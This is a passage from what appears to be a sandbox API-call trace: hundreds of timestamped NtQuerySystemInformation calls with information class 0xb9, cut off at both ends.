SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a8, Length=0x58, ResultLength=0x0) [0210.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x28, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x28, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3d0, Length=0x20, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3d0, Length=0x20, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3d0, Length=0x20, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x28, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0210.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x28, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd370, Length=0x20, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd370, Length=0x20, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd370, Length=0x20, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 